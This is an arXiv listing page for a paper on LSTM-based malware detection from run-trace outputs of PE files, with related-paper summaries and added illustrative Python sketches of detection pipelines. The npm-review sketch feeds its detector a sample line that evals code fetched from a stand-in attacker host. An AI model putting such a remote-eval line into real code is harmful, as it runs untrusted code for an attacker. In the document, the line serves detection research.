Malicious Code Detection: Run Trace Output Analysis by LSTM
- URL: http://arxiv.org/abs/2101.05646v1
- Date: Thu, 14 Jan 2021 15:00:42 GMT
- Title: Malicious Code Detection: Run Trace Output Analysis by LSTM
- Authors: Cengiz Acarturk, Melih Sirlanci, Pinar Gurkan Balikcioglu, Deniz
Demirci, Nazenin Sahin, Ozge Acar Kucuk
- Abstract summary: We propose a methodological framework for detecting malicious code by analyzing run trace outputs with Long Short-Term Memory (LSTM) networks.
We created our dataset from run trace outputs obtained from dynamic analysis of PE files.
Experiments showed that the ISM achieved an accuracy of 87.51% and a false positive rate of 18.34%, while the BSM achieved an accuracy of 99.26% and a false positive rate of 2.62%.
- License: http://creativecommons.org/licenses/by/4.0/
- Abstract: Malicious software threats and their detection have been gaining importance
as a subdomain of information security due to the expansion of ICT applications
in daily settings. A major challenge in designing and developing anti-malware
systems is the coverage of the detection, particularly the development of
dynamic analysis methods that can detect polymorphic and metamorphic malware
efficiently. In the present study, we propose a methodological framework for
detecting malicious code by analyzing run trace outputs with Long Short-Term
Memory (LSTM) networks. We developed models of run traces of malicious and benign
Portable Executable (PE) files. We created our dataset from run trace outputs
obtained from dynamic analysis of PE files. The resulting dataset represented
each run trace as a sequence of instructions and was called the Instruction as a
Sequence Model (ISM). By splitting this dataset into basic blocks, we obtained a
second dataset, called the Basic Block as a Sequence Model (BSM). The experiments
showed that the ISM achieved an accuracy of 87.51% and a false positive rate of
18.34%, while the BSM achieved an accuracy of 99.26% and a false positive rate of
2.62%.
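As a rough illustration of the approach described above, the following minimal sketch trains an LSTM classifier on toy instruction sequences in the spirit of the ISM setup. The toy traces, vocabulary handling, and hyperparameters are illustrative assumptions, not the authors' actual configuration.

```python
# Minimal sketch (assumption-laden): an LSTM over tokenized run-trace
# instructions, labeled benign (0) or malicious (1). Toy data only.
import numpy as np
import tensorflow as tf

traces = [
    ["push ebp", "mov ebp,esp", "call 0x401000", "ret"],      # toy benign trace
    ["xor eax,eax", "jmp 0x402000", "call 0x403000", "ret"],  # toy malicious trace
]
labels = np.array([0.0, 1.0])

# ISM-style tokenization: one token per instruction.
vocab = {tok: i + 1 for i, tok in enumerate(sorted({t for tr in traces for t in tr}))}
encoded = [[vocab[t] for t in tr] for tr in traces]
x = tf.keras.utils.pad_sequences(encoded, maxlen=16)

model = tf.keras.Sequential([
    tf.keras.layers.Embedding(input_dim=len(vocab) + 1, output_dim=32),
    tf.keras.layers.LSTM(64),
    tf.keras.layers.Dense(1, activation="sigmoid"),
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])
model.fit(x, labels, epochs=2, verbose=0)
print(model.predict(x, verbose=0))
```

A BSM-style variant would group consecutive instructions into basic blocks (split at control-transfer instructions such as jumps, calls, and returns) and feed block-level tokens to the same architecture.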
Related papers
- $X^2$-DFD: A framework for eXplainable and eXtendable Deepfake Detection [52.14468236527728]
We propose a novel framework called $X^2$-DFD, consisting of three core modules.
The first module, Model Feature Assessment (MFA), measures the detection capabilities of forgery features intrinsic to MLLMs, and gives a descending ranking of these features.
The second module, Strong Feature Strengthening (SFS), enhances the detection and explanation capabilities by fine-tuning the MLLM on a dataset constructed based on the top-ranked features.
The third module, Weak Feature Supplementing (WFS), improves the fine-tuned MLLM's capabilities on lower-ranked features by integrating external dedicated detectors.
arXiv Detail & Related papers (2024-10-08T15:28:33Z) - SLIFER: Investigating Performance and Robustness of Malware Detection Pipelines [12.940071285118451]
Academia focuses on combining static and dynamic analysis within a single model or an ensemble of models.
In this paper, we investigate the properties of malware detectors built with multiple and different types of analysis.
As far as we know, we are the first to investigate the properties of sequential malware detectors, shedding light on their behavior in a real production environment.
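For intuition only, here is a minimal sketch of a sequential detection pipeline of the kind discussed in this entry: analysis modules run in order and the first confident verdict decides. The stub analyzers, thresholds, and data are hypothetical placeholders, not SLIFER's actual components.

```python
# Hedged sketch: stages run sequentially; the first confident verdict
# short-circuits the remaining (typically more expensive) analyses.
from typing import Callable, List, Optional, Tuple

Detector = Callable[[bytes], Tuple[Optional[bool], float]]  # (verdict, confidence)

def static_signature_check(sample: bytes) -> Tuple[Optional[bool], float]:
    # Hypothetical static stage: flag a known byte pattern, else abstain.
    return (True, 0.99) if b"EVIL" in sample else (None, 0.0)

def dynamic_trace_model(sample: bytes) -> Tuple[Optional[bool], float]:
    # Hypothetical dynamic stage: pretend longer samples look suspicious.
    return (len(sample) > 64, 0.7)

def sequential_detect(sample: bytes, stages: List[Detector]) -> bool:
    for stage in stages:
        verdict, confidence = stage(sample)
        if verdict is not None and confidence >= 0.6:
            return verdict          # first confident stage decides
    return False                    # default to benign if every stage abstains

print(sequential_detect(b"MZ...EVIL...", [static_signature_check, dynamic_trace_model]))
```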
arXiv Detail & Related papers (2024-05-23T12:06:10Z) - FoC: Figure out the Cryptographic Functions in Stripped Binaries with LLMs [54.27040631527217]
We propose a novel framework called FoC to Figure out the Cryptographic functions in stripped binaries.
We first build a binary large language model (FoC-BinLLM) to summarize the semantics of cryptographic functions in natural language.
We then build a binary code similarity model (FoC-Sim) upon the FoC-BinLLM to create change-sensitive representations and use it to retrieve similar implementations of unknown cryptographic functions in a database.
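A minimal sketch of the retrieval idea in this entry, assuming functions are already mapped to vector embeddings: unknown cryptographic functions are matched against a database by cosine similarity. The hash-seeded embed() below is a hypothetical stand-in for FoC-Sim's learned, change-sensitive representations.

```python
# Hedged sketch: cosine-similarity retrieval over function embeddings.
import hashlib
import numpy as np

def embed(code: str, dim: int = 64) -> np.ndarray:
    # Placeholder embedding: deterministic pseudo-random unit vector per input.
    seed = int(hashlib.sha256(code.encode()).hexdigest(), 16) % (2**32)
    rng = np.random.default_rng(seed)
    v = rng.standard_normal(dim)
    return v / np.linalg.norm(v)

database = {
    "aes_encrypt_impl": embed("aes rounds sbox mixcolumns"),
    "sha256_compress":  embed("sha256 rotr maj ch schedule"),
}

def retrieve(query_code: str, top_k: int = 1):
    q = embed(query_code)
    scored = [(name, float(q @ vec)) for name, vec in database.items()]
    return sorted(scored, key=lambda s: s[1], reverse=True)[:top_k]

print(retrieve("unknown function with sbox-like table lookups"))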
arXiv Detail & Related papers (2024-03-27T09:45:33Z) - Leveraging Large Language Models to Detect npm Malicious Packages [4.479741014073169]
This study empirically examines the effectiveness of Large Language Models (LLMs) in detecting malicious code.
We present SocketAI, a code review workflow for detecting malicious code in npm packages.
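A minimal sketch of an LLM-assisted review loop of the kind this entry describes. query_llm() is a hypothetical stub for a real model call, and the prompt and JSON verdict schema are illustrative assumptions rather than SocketAI's actual workflow.

```python
# Hedged sketch: ask a (stubbed) LLM to review package source and return a verdict.
import json

def query_llm(prompt: str) -> str:
    # Hypothetical placeholder for a real LLM API call.
    return json.dumps({"malicious": "eval(" in prompt, "reason": "dynamic eval of remote payload"})

def review_package(name: str, source: str) -> dict:
    prompt = (
        f"Review the npm package '{name}' for malicious behavior "
        f"(exfiltration, obfuscated downloads, install-time execution).\n"
        f"Respond as JSON with keys 'malicious' and 'reason'.\n\n{source}"
    )
    return json.loads(query_llm(prompt))

print(review_package("example-pkg", "const p = eval(fetch('http://evil.example'))"))
```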
arXiv Detail & Related papers (2024-03-18T19:10:12Z) - Discovering Malicious Signatures in Software from Structural
Interactions [7.06449725392051]
We propose a novel malware detection approach that leverages deep learning, mathematical techniques, and network science.
Our approach focuses on static and dynamic analysis and utilizes the Low-Level Virtual Machine (LLVM) to profile applications within a complex network.
Our approach marks a substantial improvement in malware detection, providing a notably more accurate and efficient solution.
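For intuition, a minimal sketch of the structural idea in this entry: represent a program as a graph of interacting components and feed simple graph statistics to a classifier. The toy call edges and features are assumptions; the paper derives its graphs from LLVM-level profiling rather than from hand-written edge lists.

```python
# Hedged sketch: graph statistics as features for a malware classifier.
import networkx as nx
import numpy as np
from sklearn.linear_model import LogisticRegression

def graph_features(edges):
    g = nx.DiGraph(edges)
    degrees = [d for _, d in g.degree()]
    return [g.number_of_nodes(), g.number_of_edges(),
            nx.density(g), float(np.mean(degrees))]

# Toy training data: (call-graph edges, label) with 1 = malicious.
samples = [
    ([("main", "read_file"), ("main", "print")], 0),
    ([("main", "connect"), ("connect", "send"), ("main", "crypt"), ("crypt", "send")], 1),
]
X = np.array([graph_features(edges) for edges, _ in samples])
y = np.array([label for _, label in samples])

clf = LogisticRegression().fit(X, y)
print(clf.predict(X))
```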
arXiv Detail & Related papers (2023-12-19T23:42:20Z) - Malicious code detection in android: the role of sequence characteristics and disassembling methods [0.0]
We investigate and emphasize the factors that may affect the accuracy of the models built by researchers.
Our findings exhibit that the disassembly method and different input representations affect the model results.
arXiv Detail & Related papers (2023-12-02T11:55:05Z) - MAPS: A Noise-Robust Progressive Learning Approach for Source-Free
Domain Adaptive Keypoint Detection [76.97324120775475]
Cross-domain keypoint detection methods always require accessing the source data during adaptation.
This paper considers source-free domain adaptive keypoint detection, where only the well-trained source model is provided to the target domain.
arXiv Detail & Related papers (2023-02-09T12:06:08Z) - Analyzing Modality Robustness in Multimodal Sentiment Analysis [48.52878002917685]
Building robust multimodal models is crucial for achieving reliable deployment in the wild.
We propose simple diagnostic checks for modality robustness in a trained multimodal model.
We analyze well-known robust training strategies to alleviate the issues.
arXiv Detail & Related papers (2022-05-30T23:30:16Z) - Towards an Automated Pipeline for Detecting and Classifying Malware
through Machine Learning [0.0]
We propose a malware taxonomic classification pipeline able to classify Windows Portable Executable files (PEs).
Given an input PE sample, it is first classified as either malicious or benign.
If malicious, the pipeline further analyzes it in order to establish its threat type, family, and behavior(s).
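A minimal sketch of the two-stage flow this entry describes: a binary malicious-vs-benign classifier, followed by a family classifier applied only to samples flagged as malicious. The random feature vectors and labels are toy placeholders, not real PE features.

```python
# Hedged sketch: stage 1 decides malicious vs. benign; stage 2 assigns a family.
import numpy as np
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(0)
X = rng.standard_normal((200, 16))       # toy PE feature vectors
y_bin = rng.integers(0, 2, 200)          # 0 = benign, 1 = malicious (toy labels)
y_family = rng.integers(0, 3, 200)       # toy family labels

binary_clf = RandomForestClassifier(random_state=0).fit(X, y_bin)
mal_mask = y_bin == 1
family_clf = RandomForestClassifier(random_state=0).fit(X[mal_mask], y_family[mal_mask])

def classify(sample: np.ndarray) -> str:
    if binary_clf.predict(sample[None, :])[0] == 0:
        return "benign"
    return f"malicious, family {family_clf.predict(sample[None, :])[0]}"

print(classify(X[0]))
```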
arXiv Detail & Related papers (2021-06-10T10:07:50Z) - Robust and Transferable Anomaly Detection in Log Data using Pre-Trained
Language Models [59.04636530383049]
Anomalies or failures in large computer systems, such as the cloud, have an impact on a large number of users.
We propose a framework for anomaly detection in log data, a major source of system information for troubleshooting.
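A minimal sketch of log-based anomaly detection, assuming log lines can be vectorized: TF-IDF features plus an Isolation Forest stand in here for the pre-trained language-model representations the paper actually uses.

```python
# Hedged sketch: fit an outlier detector on normal logs, then score new lines.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import IsolationForest

normal_logs = [
    "INFO connection established to db-01",
    "INFO request served in 12ms",
    "INFO connection established to db-02",
    "INFO request served in 9ms",
]
new_logs = [
    "INFO request served in 11ms",
    "ERROR kernel panic: unable to mount root fs",
]

vec = TfidfVectorizer().fit(normal_logs)
detector = IsolationForest(random_state=0).fit(vec.transform(normal_logs).toarray())
print(detector.predict(vec.transform(new_logs).toarray()))  # -1 marks an anomaly
```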
arXiv Detail & Related papers (2021-02-23T09:17:05Z) - Self-Supervised Log Parsing [59.04636530383049]
Large-scale software systems generate massive volumes of semi-structured log records.
Existing approaches rely on log-specific heuristics or manual rule extraction.
We propose NuLog that utilizes a self-supervised learning model and formulates the parsing task as masked language modeling.
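A minimal sketch of the parsing objective behind this entry: tokens that stay constant across similar log lines form the template, while variable tokens are masked out. The frequency heuristic below is a simplified stand-in for the paper's masked-language-modeling formulation.

```python
# Hedged sketch: keep tokens that are stable across log lines, mask the rest.
from collections import Counter

logs = [
    "Connection from 10.0.0.1 closed",
    "Connection from 10.0.0.7 closed",
    "Connection from 192.168.1.4 closed",
]
tokenized = [line.split() for line in logs]

template = []
for position in zip(*tokenized):
    token, freq = Counter(position).most_common(1)[0]
    template.append(token if freq == len(logs) else "<*>")

print(" ".join(template))  # Connection from <*> closed
```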
arXiv Detail & Related papers (2020-03-17T19:25:25Z)